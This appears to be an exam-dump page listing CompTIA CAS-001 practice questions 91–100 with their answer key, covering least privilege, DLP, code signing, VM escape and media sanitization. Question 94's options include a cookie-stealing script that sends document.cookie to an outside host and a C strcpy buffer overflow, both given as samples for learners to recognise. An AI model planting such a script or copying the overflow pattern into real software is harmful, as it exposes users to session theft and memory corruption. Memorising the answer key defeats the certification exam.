[Free] Download New Latest (November) CompTIA CAS-001 Actual Tests 91-100

Ensurepass

QUESTION 91

An administrator is reviewing a recent security audit and determines that two users in finance also have access to the human resource data. One of those users fills in for any HR employees on vacation, the other user only works in finance. Which of the following policies is being violated by the finance user according to the audit results?

A. Mandatory vacation
B. Non-disclosure
C. Job rotation
D. Least privilege

Correct Answer: D

 

 

QUESTION 92

A security manager has provided a Statement of Work (SOW) to an external penetration testing firm for a web application security test. The web application starts with a very simple HTML survey form with two components: a country selection dropdown list and a submit button. The penetration testers are required to provide their test cases for this survey form in advance. In order to adequately test the input validation of the survey form, which of the following would be the BEST tool for the technician to use?

A. HTTP interceptor
B. Vulnerability scanner
C. Port scanner
D. Fuzzer

Correct Answer: A

 

 

QUESTION 93

An employee was terminated and promptly escorted to their exit interview, after which the employee left the building. It was later discovered that this employee had started a consulting business using screenshots of their work at the company, which included live customer data. This information had been removed through the use of a USB device. After this incident, it was determined that a process review must be conducted to ensure this issue does not recur. Which of the following business areas should primarily be involved in this discussion? (Select TWO).

A. Database Administrator
B. Human Resources
C. Finance
D. Network Administrator
E. IT Management

Correct Answer: BE

 

QUESTION 94

Which of the following displays an example of a buffer overflow attack?

A.
<SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>

B.
Checksums-Sha1:
7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C.
#include <string.h>
char *code = "AAAABBBBCCCCDDD"; // including the terminating '\0', size = 16 bytes
void main()
{
    char buf[8];          // 8-byte destination buffer
    strcpy(buf, code);    // copies 16 bytes into an 8-byte buffer: overflow
}

D.
<form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
Password: <input type=password name=password>
<input type=submit value=Login>
</form>

Correct Answer: C

 

 

QUESTION 95

A security administrator of a large private firm is researching and putting together a proposal to purchase an IPS. The specific IPS type has not been selected, and the security administrator needs to gather information from several vendors to determine a specific product. Which of the following documents would assist in choosing a specific brand and model?

A. RFC
B. RTO
C. RFQ
D. RFI

Correct Answer: D

 

 

QUESTION 96

The Chief Information Officer (CIO) comes to the security manager and asks what can be done to reduce the potential of sensitive data being emailed out of the company. Which of the following is an active security measure to protect against this threat?

A. Require a digital signature on all outgoing emails.
B. Sanitize outgoing content.
C. Implement a data classification policy.
D. Implement a spam filter.

Correct Answer: B


QUESTION 97

A script was recently altered by its author to meet certain security requirements and needs to be executed on several critical servers. Which of the following describes the process of ensuring that the script being used was not altered by anyone other than the author?

A. Digital encryption
B. Digital signing
C. Password entropy
D. Code signing

Correct Answer: D

 

 

QUESTION 98

A company has decided to use the SDLC for the creation and production of a new information system. The security administrator is training all users on how to protect company information while using the new system, along with being able to recognize social engineering attacks. Senior Management must also formally approve of the system prior to it going live. In which of the following phases would these security controls take place?

A. Operations and Maintenance
B. Implementation
C. Acquisition and Development
D. Initiation

Correct Answer: B

 

 

QUESTION 99

A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data was found on a hidden directory within the hypervisor. Which of the following has MOST likely occurred?

A. A stolen two-factor token and a memory-mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token.
B. An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk.
C. A host server was left unpatched and an attacker was able to use a VM escape attack to gain unauthorized access.
D. A virtual guest was left unpatched and an attacker was able to use a privilege escalation attack to gain unauthorized access.

Correct Answer: C

 

 

QUESTION 100

Which of the following is the MOST cost-effective solution for sanitizing a DVD with sensitive information on it?

A. Write over the data
B. Purge the data
C. Incinerate the DVD
D. Shred the DVD

Correct Answer: D

 
